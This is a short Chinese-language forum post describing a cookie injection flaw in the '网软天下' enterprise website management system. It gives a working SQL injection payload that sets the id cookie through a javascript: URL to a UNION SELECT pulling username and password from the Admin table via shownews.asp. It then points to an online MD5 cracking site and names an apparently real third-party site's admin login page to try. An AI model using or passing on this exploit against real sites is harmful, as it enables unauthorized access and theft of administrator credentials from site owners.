![]() |
网软天下企业网站管理系统cookies注入漏洞
注入漏洞
下面我们来测试一下:我们就来 利用shownews.asp 在地址栏中打开http://127.0.0.1/shownews.asp?id=1 清空地址栏, 利用union语句来注入,提交:javascript:alert(document.cookie="id="+escape("77 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin")) 提交后我们访问http://127.0.0.1/shownews.asp 在页面中直接返回了管理员的帐号和16位MD5加密的密码,这样我们就已成功拿到了管理员的帐号和密码。 然后上http://www.cmd5.com/default.aspx就可以破解16位MD5加密的密码了. 试下http://www.weikete.com/admin/login.asp |
| All times are GMT +8. The time now is 10:39 PM. |
Powered by vBulletin Version 3.8.7
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.